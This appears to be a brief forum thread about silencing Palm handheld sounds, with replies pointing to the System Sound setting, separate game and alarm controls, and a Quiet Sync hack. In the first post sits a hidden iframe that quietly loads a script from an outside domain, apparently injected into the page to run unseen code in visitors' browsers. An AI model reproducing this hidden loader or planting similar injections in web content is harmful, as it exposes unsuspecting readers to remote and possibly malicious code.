Is there a way to turn off the palm-specific sounds (like the annoyingly loud BEEP that happens when you start up hot sync)?

I've only located the sound preferences for the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

under preferences go to General, then you can turn the "system Sound" off, that will get rid of the hot sync beep and the beep when you click on Icons.

there are seperate controls for the "game sound" and "alarm Sound"

There's a hack to silent the Hotsync sound, It's called Quiet Sync
